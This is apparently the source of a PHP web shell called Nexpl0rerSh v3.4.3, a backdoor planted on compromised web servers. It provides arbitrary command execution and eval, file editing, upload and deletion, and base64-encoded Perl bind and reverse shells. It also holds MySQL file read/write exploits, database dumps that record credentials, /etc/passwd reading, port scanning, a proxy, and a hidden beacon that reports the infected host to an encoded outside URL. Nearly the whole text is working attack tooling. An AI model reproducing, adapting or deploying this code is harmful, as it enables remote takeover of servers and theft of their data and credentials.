- $perms = fileperms($file);
- $info = getperms($perms);
- if (!is_readable($file)) $info = "<font color=red>{$info}</font>";
- elseif (!is_writable($file)) $info = "<font color=white>{$info}</font>";
- else $info = "<font color=green>{$info}</font>";
- $output.= ' <tr style="background-color:'.$color.';">
- <td style="border-bottom:#FFFFFF 1px solid;">'.$info.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;" align="right"><img src="http://'.getenv("HTTP_HOST").$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'].'&act=img&img=folder" /></td>
- <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">'.$file.'</a></td>
- <td style="border-bottom:#FFFFFF 1px solid;">'.$owner.'</td>
- <td style="border-bottom:#FFFFFF 1px solid;"><a class="link" href="javascript:document.folder.dir.value=\''.addslashes(realpath($file)).'\';document.folder.submit();">Go</a></td>
- </tr>';
- }
- }
- $i++;
- }
- $output .= "</div>";
- }
- //Editing file...
- if ($_POST['mode']=="edit") {
- ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile'];
- $content = file_get_contents($file);
- if ($_POST[modfile]=="config.php") {
- include($file);
- $link = "javascript:var form=document.sqlpanel; form.user.value='".addslashes($dbuser).
- "';form.pass.value='".addslashes($dbpasswd)."';form.host.value='".addslashes($dbhost).
- "';form.dbname.value='".addslashes($dbname)."';document.sqlpanel.submit();";
- $output .= "phpBB config file detected! click <a class=\"link\" href=\"$link\">here</a> to connect<br />";
- }
- $output .= "<form action=# method=post><input type=hidden name=mode value=doedit><input type=hidden name=modfile value='".$_POST['modfile']."'>
- <textarea rows=30 cols=100 name=newtext>".htmlspecialchars($content)."</textarea><br /><input type=submit value=edit></form>";
- }
- if ($_POST['mode']=="doedit") {
- ($dir==realpath(".")) ? $file=$_POST['modfile'] : $file=$dir.$_POST['modfile'];
- $output .= $file."<br />";
- $fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
- $_POST['newtext'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['newtext']) : $_POST['newtext'];
- fwrite($fh, $_POST['newtext'])or die("<font color=red>Error: cannot write to file</font>");
- fclose($fh);
- $output .= "Done.";
- }
- //Making file..
- if ($_POST['mode'] == "mkfile") {
- ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile'];
- $output .= "<form action=# method=post><input type=hidden name=mode value=domkfile><input type=hidden name=mkfile value='".$_POST['mkfile']."'>
- <textarea rows=30 cols=100 name=text></textarea><br /><input type=submit value=make></form>";
- }
- if ($_POST['mode'] == "domkfile") {
- ($dir==realpath(".")) ? $file=$_POST['mkfile'] : $file=$dir.$_POST['mkfile'];
- $fh = fopen($file, "w+")or die("<font color=red>Error: cannot create file</font>");
- $_POST['text'] = (ini_get("magic_quotes_gpc")) ? stripslashes($_POST['text']) : $_POST['text'];
- fwrite($fh, $_POST['text'])or die("<font color=red>Error: cannot write to file</font>");
- fclose($fh);
- $output .= "Made.";
- }
- //Deleting file..
- if ($_POST['mode'] == "delfile") {
- ($dir==realpath(".")) ? $file=$_POST['delfile'] : $file=$dir.$_POST['delfile'];
- unlink($file)or die("<font color=red>Error: cannot delete file</font>");
- $output .= "File deleted.";
- }
- // cmd...
- if ($_POST['mode'] == "cmd") {
- /*switch ($_POST['func']) {
- case "system":
- system(stripslashes($_POST['cmd']));
- die();
- break;
- case "popen":
- $handle = popen($_POST['cmd'].' 2>&1', 'r');
- echo "'$handle'; " . gettype($handle) . "\n";
- $read = fread($handle, 2096);
- echo $read;
- pclose($handle);
- die();
- break;
- case "shell_exec":
- shell_exec(stripslashes($_POST['cmd']));
- die();
- break;
- case "exec":
- exec(stripslashes($_POST['cmd']));
- die();
- break;
- case "passthru":
- passthru(stripslashes($_POST['cmd']));
- die();
- break;}*/
- chdir($dir);
- $res = exa(stripslashes($_POST[cmd]));
- $output = $res;
- }
- // upload
- if ($_POST['mode'] == "upload2") {
- $percorso = $_FILES['myfile']['tmp_name'];
- $nome = $_FILES['myfile']['name'];
- if (!move_uploaded_file($percorso, $dir.$nome))
- {
- $output = "<font color=red>Cannot upload</font>";
- }
- else { $output .= "<br><br>$nome Has Been Saved!";}
- }
- // rename
- if ($_POST['mode'] == "renfile") {
- if(!rename($dir.$_POST['oldname'], $dir.$_POST['newname'])) $output = "<font color=red>Cannot rename file</font>";
- else $output = "File renamed.";
- }
- // Bind port
- if ($_POST['mode'] == "bind") {
- chdir($dir);
- $os = substr(strtoupper(PHP_OS),0,3);
- $port = 31337;
- $txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0OyANCnVzZSBGaWxlSGFuZGxlOyAjIHBlciBsJ2F1dG9mbHVzaA0KJG1heF9jb25uPTEwOw0KJHBvcnRhX2xvY2FsZT0kQVJHVlswXTsNCiRzeXMgPSAkQVJHVlsxXTsNCmlmICgkc3lzIGVxICJMSU4iKSB7ICRjbWQgPSAiL2Jpbi9iYXNoIjsgfQ0KaWYgKCRzeXMgZXEgIldJTiIpIHsgJGNtZCA9ICJDOlxcd2luZG93c1xcc3lzdGVtMzJcXGNtZC5leGUiOyB9DQokcGFkZHJfbG9jYWxlPXBhY2tfc29ja2FkZHJfaW4oJHBvcnRhX2xvY2FsZSxJTkFERFJfQU5ZKTsNCnNvY2tldChTRVJWLEFGX0lORVQsU09DS19TVFJFQU0sJ3RjcCcpIHx8IGRpZSgiRXJyb3JlOiAkISIpOyAgI3NlcnZlci1zb2NrZXQNCnNldHNvY2tvcHQoU0VSVixTT0xfU09DS0VULFNPX1JFVVNFQUREUiwxKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmJpbmQoU0VSViwkcGFkZHJfbG9jYWxlKSB8fCBkaWUoIkVycm9yZTogJCEiKTsNCmxpc3RlbihTRVJWLCRtYXhfY29ubikgfHwgZGllKCJFcnJvcmU6ICQhIik7DQpteSAkcGFkZHJfc2luZz1hY2NlcHQoU0lORywgU0VSVik7ICNhY2NldHRvIGxhIGNvbm5lc3Npb25lIGRhbCBjbGllbnQNCm15KCRzaW5nX3BvcnRhLCRzaW5nX2FkZHIsJGdldCk9dW5wYWNrX3NvY2thZGRyX2luKCRwYWRkcl9zaW5nKTsNClNJTkctPmF1dG9mbHVzaCgpOw0Kb3BlbihTVERJTiwgIj4mU0lORyIpOw0Kb3BlbihTVERPVVQsIj4mU0lORyIpOw0Kb3BlbihTVERFUlIsIj4mU0lORyIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IEJpbmQgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMoJGNtZCk7DQpjbG9zZShTSU5HKTs=");
- fwrite(fopen("bind.pl", "w+"), $txt);
- exa("perl bind.pl ".$port." ".$os);
- unlink("bind.pl");
- }
- // Reverse c0nn
- if ($_POST['mode'] == "reverse") {
- chdir($dir);
- $os = substr(strtoupper(PHP_OS),0,3);
- $txt = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gJEFSR1ZbMV07DQokc3lzID0gJEFSR1ZbMl07DQoNCiAgICBpZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiWyFdIFVzZTogcmV2ZXJzZS5wbCA8WW91ckhvc3Q+IDxZb3VyUG9ydD4gPHN5c3RlbT5cbiI7DQogIHByaW50ZiAiWypdIE5vdGU6IHN5c3RlbSBjYW4gYmUgTElOIG9yIFdJTiI7DQogIGV4aXQoMSk7DQp9DQppZiAoJHN5cyBlcSAiTElOIikgeyAkY21kID0gIi9iaW4vYmFzaCI7IH0NCmlmICgkc3lzIGVxICJXSU4iKSB7ICRjbWQgPSAiQzpcXFdpbmRvd3NcXHN5c3RlbTMyXFxjbWQuZXhlIjsgfQ0KcHJpbnQgIlsrXSBDb25uZWN0aW5nLi4uIFskaG9zdF1cbiI7DQokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyB1IGNhbiBjaGFuZ2UgdGhpcw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90KSB8fCBkaWUgKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGllKCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30NCiAgb3BlbihTVERJTiwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERPVVQsIj4mU0VSVkVSIik7DQogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgCS09IFJldmVyc2UgU2hlbGwgQmFja2Rvb3IgPS0JXG4iOw0KcHJpbnQgIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuIjsNCnByaW50ICIgRGV0ZWN0ZWQgc2hlbGw6ICRjbWQJCVxuIjsNCnByaW50ICItLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cblxuIjsNCmV4ZWMgKCRjbWQpOyA=");
- fwrite(fopen("reverse.pl", "w+"), $txt);
- exa("perl reverse.pl ".$_POST[ip]." ".$_POST[port]." ".$os);
- unlink("reverse.pl");
- }
- // MySQL EXPLOIT read file
- if ($_POST['mode'] == "sqlexploit") {
- $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
- $db = mysql_select_db($_COOKIE['mysql_name']);
- $path = $_POST['path'];
- $query = "CREATE TABLE `nexpl0it` (`path` longtext not null);";
- $delete = "DROP TABLE `nexpl0it`;";
- $bypass = "LOAD DATA LOCAL INFILE '$path' INTO TABLE nexpl0it;";
- $fuck = "SELECT * FROM nexpl0it;";
- mysql_query($delete);
- mysql_query($query);
- mysql_query($bypass)or die("Mysql-exploit-error : ".mysql_error());
- $res = mysql_query($fuck)or die(mysql_error());
- $txt = "";
- while($row = mysql_fetch_array($res)) {
- $txt .= $row[path]."\n";
- }
- $output = "<form action=# method=POST><input type=hidden name=mode value=sqlwritefile>File : <b><input type=text name=path value='$path'>
- <input type=submit value=Save> </b><br /><br />
- <textarea rows=30 cols=100 name=newtext>".htmlspecialchars($txt)."</textarea></form>";
- }
- // MySQL EXPLOIT write
- if ($_POST['mode'] == "sqlwritefile") {
- $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
- $db = mysql_select_db($_COOKIE['mysql_name']);
- $path = $_POST['path'];
- $content = $_POST['newtext'];
- $txt = bin2hex($content);
- $query = "SELECT 0x{$txt} INTO DUMPFILE '$path';";
- $res = mysql_query($query)or die(mysql_error());
- $output = $path." saved!";
- }
- // MySQL Login
- if ($_POST['mode'] == "loginsql") {
- setcookie("mysql_user", $_POST['user']);
- setcookie("mysql_pass",$_POST['pass']);
- setcookie("mysql_host",$_POST['host']);
- setcookie("mysql_name",$_POST['dbname']);
- $link = mysql_connect($_POST['host'], $_POST['user'], $_POST['pass'])or die(mysql_error());
- $db = mysql_select_db($_POST['dbname']);
- $output = '<table width="100%" border=0><tr><td><form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
- <input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
- <input type="submit" name="Submit" value="Query" />
- </form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_POST[dbname].'" size="30">
- <input type=submit value=DumpDb></form></td><td align=left>
- <b>:: MySQL Exploit ::</b><br />
- <form action=# method=post><input type=hidden name=mode value=sqlexploit>Edit file: <input name=path type=text value="absolute path">
- <input type=submit value="Read/Edit"></form>
- </td></tr></table>
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- <tr>
- <td width=30%>
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- </tr>
- <tr>
- <td><center>--[ Table List ]--</center> </td>
- </tr>';
- $q = mysql_query("SHOW TABLES")or die(mysql_error());
- while ($table = mysql_fetch_array($q)) {
- $output .= '<tr>
- <td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
- </tr>';
- }
- $output .= '
- </table></td>
- <td width="70%">
- </td>
- </tr>
- </table>
- ';
- }
- // MySQL Query
- if ($_POST['mode'] == "sql_query") {
- $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
- $db = mysql_select_db($_COOKIE['mysql_name']);
- (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
- $query = mysql_query(urldecode(stripslashes($_POST['query'])))or die("Error query: <b>{".stripslashes($_POST[query])."}</b> mysql says:".mysql_error());
- $pars = array_keys(mysql_fetch_array($query));
- $npars = count($pars);
- $qwords = explode(" ", $_POST['query']);
- global $select, $table_name;
- if (strtolower($qwords[0]) == "select") {
- $select = TRUE;
- $nqw = count($qwords);
- for($i=0;$i<$nqw;$i++) {
- if (strtolower($qwords[$i]) == "from") {
- $table_name = $qwords[$i+1];
- break;
- }
- }
- }
- $parz = $pars;
- $p4rz = $parz;
- $output .= '<form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
- <input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
- <input type="submit" name="Submit" value="Query" />
- </form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_COOKIE[mysql_name].'" size="30">
- <input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- <tr>
- <td width=30% valign=top>
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- </tr>
- <tr>
- <td><center>--[ Table List ]--</center> </td>
- </tr>';
- $q = mysql_query("SHOW TABLES")or die(mysql_error());
- while ($table = mysql_fetch_array($q)) {
- $output .= '<tr>
- <td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
- </tr>';
- }
- $output .= '
- </table></td>
- <td width="70%" valign="top">
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- <tr>
- <td><center>--[ Query Result ]--</center> </td>
- </tr>
- <tr><td><table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr>
- ';
- $output .= '<td> </td>
- ';
- foreach($pars as $par) {
- $output .= (is_numeric($par) || ($par == "")) ? '' : '<td>'.$par.'</td>
- '; }
- $output .= '</tr>';
- mysql_data_seek($query, 0);
- while ($row = mysql_fetch_array($query, MYSQL_ASSOC))
- {
- $w = "";
- $i = 0;
- foreach ($row as $k=>$v) {$name = mysql_field_name($query,$i); $w .= " `".$name."` = \'".addslashes($v)."\' AND"; $i++;}
- if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
- if ($table_name == "mybb_users") $w = " uid=\'".$row['uid']."\' ";
- if ($table_name == "phpbb_users") $w = " user_id=\'".$row['user_id']."\' ";
- $output .= '<tr>';
- $output .= '<td><a class="link" href="javascript:document.update.conditions.value=\''.urlencode($w).'\';document.update.table.value=\''.$table_name.'\';document.update.submit();"><img src="'.$_SERVER['PHP_SELF'].'?act=img&img=change" border=0 /></a><a class="link" href="javascript:document.table.query.value=\''.urlencode("DELETE FROM `".$table_name."` WHERE".$w."LIMIT 1").'\';document.table.submit();"><img src="'.$_SERVER['PHP_SELF'].'?act=img&img=delete" border=0 /></a></td>
- ';
- foreach ($row as $pardd=>$rowval) {
- if (!is_numeric($pardd) && !empty($pardd)) {
- if ($row[$pardd] == "") { $output .= '<td><font color=green><b>NULL</b></font></td>'; } else { $output .= '<td>'.$row[$pardd].'</td>';}}
- }
- $output .= '</tr>';
- }
- $output .= '
- </table></td>
- </tr>
- </table><hr size="1" noshade><br>';
- }
- // MySQL Update row
- if ($_POST['mode'] == "update") {
- $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
- $db = mysql_select_db($_COOKIE['mysql_name']);
- $conditions = urldecode(stripslashes($_POST['conditions']));
- $table = $_POST['table'];
- $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die(mysql_error());
- $output .= '
- <form id="table" name="table" method="post" action="#"><input type=hidden name=mode value=sql_query />
- <input name="query" type="text" id="query" size="50" value="SELECT * FROM table_name" />
- <input type="submit" name="Submit" value="Query" />
- </form><form action=# method=post><input type=hidden name=mode value=dump_db><input name=dbname type=text value="'.$_COOKIE[mysql_name].'" size="30">
- <input type=submit value=DumpDb></form><form name="update" method=post action=#><input type=hidden name=mode value=update><input type=hidden name=conditions><input type=hidden name=table></form>
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- <tr>
- <td width=30% valign=top>
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- </tr>
- <tr>
- <td><center>--[ Table List ]--</center> </td>
- </tr>';
- $q = mysql_query("SHOW TABLES")or die(mysql_error());
- while ($table = mysql_fetch_array($q)) {
- $output .= '<tr>
- <td><center><a class="link" href="javascript:document.table.query.value=\'SELECT * FROM '.$table[0].'\';document.table.submit();">'.$table[0].'</a></center></td>
- </tr>';
- }
- $output .= '
- </table></td>
- <td width="70%" valign="top">
- <table width="100%" border="1" cellspacing="0" cellpadding="0">
- <tr>
- <td><center>--[ Query Result ]--</center> </td>
- </tr>
- <tr><td><form action=# method=post>
- <input type=hidden name=mode value=update2>
- <table cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="1%" bgColor=#000000 borderColorLight=#c0c0c0 border=1>
- ';
- while ($row = mysql_fetch_array($select, MYSQL_ASSOC)) {
- foreach ($row as $k=>$v) {
- $output .= "<tr><td>{$k}</td><td><input type=text name='{$k}' value='{$v}'></td></tr>";
- }
- }
- $output .='
- </table><input type=hidden name=table value="'.$_POST['table'].'"><input type=hidden name=conditions value="'.$_POST['conditions'].'"><input type=submit value=Update></form></td></tr></table></td>
- </tr>
- </table>
- ';
- }
- // MySQL update row 2
- if ($_POST['mode'] == "update2") {
- $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
- $db = mysql_select_db($_COOKIE['mysql_name']);
- $conditions = urldecode(stripslashes(stripslashes($_POST['conditions'])));
- $table = $_POST['table'];
- $select = mysql_query("SELECT * FROM {$table} WHERE{$conditions}LIMIT 1")or die("query : SELECT * FROM {$table} WHERE{$conditions}LIMIT 1<br /><br />".mysql_error());
- $uno = mysql_fetch_array($select, MYSQL_ASSOC);
- $pars = array_keys($uno);
- $query = "UPDATE {$table} SET";
- foreach($pars as $fields) {
- $query .= " {$fields}='{$_POST[$fields]}',";
- }
- $query = substr($query,0,strlen($query)-1);
- $query .= " WHERE{$conditions}";
- $output = "Executed query: {$query} <br /><br />";
- mysql_query($query)or die("QUERY: ".$query."<br /><br /> ERROR:".mysql_error());
- }
- // MySQL Dump
- if ($_POST['mode'] == "dump_db") {
- $dump = "# Dumped by Nexpl0rerSh 3.1 FUD Release \n";
- $dump .= "# MySQL version: (".@mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").") \n";
- $dump .= "# Database: ".$_POST['dbname']."\n";
- $dump .= "# ".$_COOKIE['mysql_user'].":".$_COOKIE['mysql_pass']."@".$_COOKIE['mysql_host']."\n";
- $db = $_POST['dbname'];
- setcookie('mysql_name', $db);
- $link = mysql_connect($_COOKIE['mysql_host'], $_COOKIE['mysql_user'], $_COOKIE['mysql_pass'])or die(mysql_error());
- (isset($_POST['dbname'])) ? mysql_select_db($_POST['dbname']) : print "";
- $q = mysql_query("SHOW TABLES")or die(mysql_error());
- while ($table = mysql_fetch_array($q)) {
- $dump .= datadump($table[0]);
- }
- $file_name = $db."_dump_".date("d_M_Y")."_Nexpl0rer.".sql;
- chdir($dir);
- $fp = fopen($file_name, "w+"); fwrite($fp, $dump); fclose($fp);
- $output .= 'Dump saved in '.$dir;
- }
- // MkDir
- if ($_POST['mode'] == "mkdir") {
- chdir($dir)or die("Error.");
- if (mkdir($_POST['mkdir'])) {
- $output = "Directory created.";
- }
- }
- // Eval
- if ($_POST['mode'] == "eval") {
- chdir($dir);
- eval(stripslashes($_POST['eval']));
- die();
- }
- // phpinfo
- if ($_POST['mode']=="phpinfo") {
- phpinfo();
- die();
- }
- // tools
- if ($_POST['mode']=="tools") {
- switch($_POST['nometool']) {
- //passwd
- case 'passwd':
- if (!($txt = file_get_contents("/etc/passwd"))) {
- $output = "Cannot open /etc/passwd";
- } else {
- $output = nl2br($txt);
- }
- break;
- //encoder
- case 'encoder':
- $output = "
- <center>
- <form action=# method=post><input type=hidden name=mode value=tools>
- <input type=hidden name=nometool value=encoder>
- <textarea name=\"plain\" cols=50 rows=5>".$_POST[plain]."</textarea>
- <br><br>
- <input type=submit value=\"calculate\"><br><br>
- </center>
- <b>Hashes</b>:<br>
- <center>md5 -
- <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".md5($_POST[plain])."\" readonly>
- <br>crypt - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".crypt($_POST[plain])."\" readonly>
- <br>sha1 - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".sha1($_POST[plain])."\" readonly><br>
- crc32 - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".crc32($_POST[plain])."\" readonly><br></center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($_POST[plain])."\" readonly>
- <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urldecode($_POST[plain])."\" readonly>
- <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($_POST[plain])."\" readonly></center><center>base64_decode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_decode($_POST[plain])."\" readonly> </center>
- <br><b>Base convertations</b>:
- <center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".dechex($_POST[plain])."\" readonly><br>
- </center></form>
- ";
- break;
- // scanner
- case 'scanner':
- $scandir = str_replace(realpath("."), "", $dir);
- $scannersh = $dir;
- if ($scannersh == "") { $scannersh = "/"; }
- chdir($scannersh);
- $evil = array("dc3", "Antichat", "s101", "nefastica", "n3tShell", "Nexen", "33rd", "c99", "c2007", "c100", "r57", "shell", "k0tw", "nexpl0rer", "paradox", "Upload", "ZipShell", "Usucktoo", "shell_exec", "exec", "DxShell", "Cod3rz", "Fire-Crash", "subzero" );
- $output .= "<br>Ho analizzato $scannersh<br>";
- $checked = array();
- foreach (glob("*.php*") as $file)
- {
- $a = fopen($file, "r+");
- $b = fread($a, filesize($file));
- for ($i = 0; $i < count($evil); $i++)
- {
- $me = array_reverse(explode("/",$_SERVER['PHP_SELF']));
- $str = eregi($evil[$i], $b);
- if (($str !== FALSE) and ($file != $me[0]) and (!in_array($file, $checked)))
- {
- array_push($checked, $file);
- $output .= "Trovato Possibile $evil[$i] in <a class='link' href='{$scandir}{$file}' target='_blank'>{$file}</a><br>";
- }
- }
- fclose($a);
- }
- break;
- // proxy
- case 'proxy':
- $output = '<form method="post" action="#">url: <input name="url" type="text" size="50" />
- <input type="submit" value="surf" />
- <input name="curl" type="checkbox" id="curl" value="curl" />
- use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />
- </form><br /><br />';
- break;
- }
- }
- // proxysurf
- if ($_POST['mode'] == 'proxysurf') {
- $output = '<form method="post" action="#">url: <input name="url" type="text" size="50" />
- <input type="submit" value="surf" />
- <input name="curl" type="checkbox" id="curl" value="curl" />
- use curl <input name="fopen" type="checkbox" id="fopen" value="fopen" /> use fopen<br /> <input type="hidden" name="mode" value="proxysurf" />
- </form><br /><br />';
- if (!$_POST[curl] && !$_POST[fopen]) {
- $dirz="";
- $u=parse_url($_POST[url]);
- $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
- if(substr_count($file,'/')>1)$dirz=substr($file,0,(strpos($file,'/')));
- $url=@fsockopen($host,80,$en,$es,12);
- if(!$url)die("<br> Can not connect to host!");
- fputs($url,"GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
- while(!feof($url)){
- $con=fgets($url);
- $output .= $con;
- }
- fclose($url);
- }
- else if ($_POST[curl])
- {
- ob_clean();
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $_POST[url]);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_exec($ch);
- curl_close($ch);
- ob_end_flush();
- }
- else if ($_POST[fopen]) {
- $file = file($_POST[url]);
- foreach ($file as $line){
- $output .= $line;
- }
- }
- }
- // chmod
- if ($_POST['mode']=="chmod") {
- chdir($dir);
- chmod($_POST[filename], intval($_POST[filemode], 8))or die("cannot change file mode");
- $output = "Mode changed!";
- }
- // portscan
- if ($_POST['mode']=="scan") {
- $opent = array();
- $host = $_POST[host];
- $range = range($_POST[min_port], $_POST[max_port]);
- foreach($range as $port) {
- $con = fsockopen($host, $port, $errno, $errstr, 12);
- if ($con) $opent[] = $port;
- }
- $output = "Found ".count($opent)." opened ports:<br />";
- while(list($num, $value)=each($opent)) {
- $output .= "<b>$num</b> : $value<br />";
- }
- }
- ?><html>
- <head>
- <style type="text/css">
- body {background-color:#000000; font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; color:#FFFFFF;}
- .link {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#FFFFFF; font-weight:bolder; text-decoration:underline;}
- .header {
- font-size: 24px;
- font-weight: bold;
- }
- td#info {font-family:Verdana, Arial, Helvetica, sans-serif; font-size:12px; color:#000000; font-weight:bold}
- td {
- font-size:12px;
- }
- .Stile1 {
- color: #0099FF;
- font-weight: bold;
- }
- input {
- background-color: #0066FF;
- border:#FFFFFF 2px solid;
- color:#FFFFFF;
- font-family:Verdana;
- font-size:10px;
- }
- textarea {
- background-color: #0066FF;
- border:#FFFFFF 2px solid;
- color:#FFFFFF;
- font-family:Verdana;
- font-size:10px;
- }
- select {
- background-color: #0066FF;
- border:#FFFFFF 2px solid;
- color:#FFFFFF;
- font-family:Verdana;
- font-size:10px;
- }
- .Stile2 {color: #FF0000}
- .Stile4 {color: #FFFFFF}
- </style>
- <title><?="[nex@".getenv("HTTP_HOST")." ~]"?></title></head>
- <body>
- <table style="background-color:#333333; border-left:#FFFFFF 1px solid; border-right:#FFFFFF 1px solid;" width="90%" border="0" align="center" cellpadding="0" cellspacing="0">
- <tr>
- <td style="font-size:12px;"><div align="center" class="header"><span class="Stile4"><font size='6' face='Webdings'>!</font></span>Nexpl0rerSh v3<span class="Stile2">.4.3</span> BL4cK Release<span class="Stile4"><font size='6' face='Webdings'>!</font></span></div>
- <div align="center"><strong>Shell info: </strong> <span class="Stile2">Author:</span> Nexen <span class="Stile2">Release Date:</span> 1 June 2008 </div>
- <table style="background-color:#999999;" width="100%" border="0" cellspacing="0" cellpadding="0">
- <tr>
- <td id="info" width="50%">PHP Version: <?=phpversion()?><br>
- Address: <?=$_SERVER['SERVER_ADDR'];?>
- <br>
- Name: <?=$_SERVER['HTTP_HOST'];?>
- <br>
- Uname -a: <?=$uname?>
- ( <?=PHP_OS?> )<br>
- Software: <?=$_SERVER['SERVER_SOFTWARE'];?><br>
- Free <?=$freespace?> of <?=$totalspace?> (<?=$percentfree?>%)<br></td>
- <td id="info" width="50%"><div align="left">
- <?=$safemode?>
- <?=$gpc?>
- <?=$auf?>
- <?=$reglobals?><?=$current_user?>
- <?=$uid?>
- </div></td>
- </tr>
- </table>
- <script language=Javascript>
- var x = new Image();
- x.src = "<?=base64_decode($images[url]).getenv("HTTP_HOST").$_SERVER['PHP_SELF']?>";
- </script>
- <table width="100%" border="0" cellspacing="0" cellpadding="0">
- <tr>
- <td style="border:#FFFFFF 1px solid;"><form name=fedit action=# method=post>
- <div align="center"> <strong>:: Edit file :: </strong><br>
- <input type=hidden name=mode value=edit>
- name
- <input type=text name=modfile size="12">
- <input type=submit value=edit>
- </div></form></td>
- <td style="border:#FFFFFF 1px solid;"><form action=# method=post>
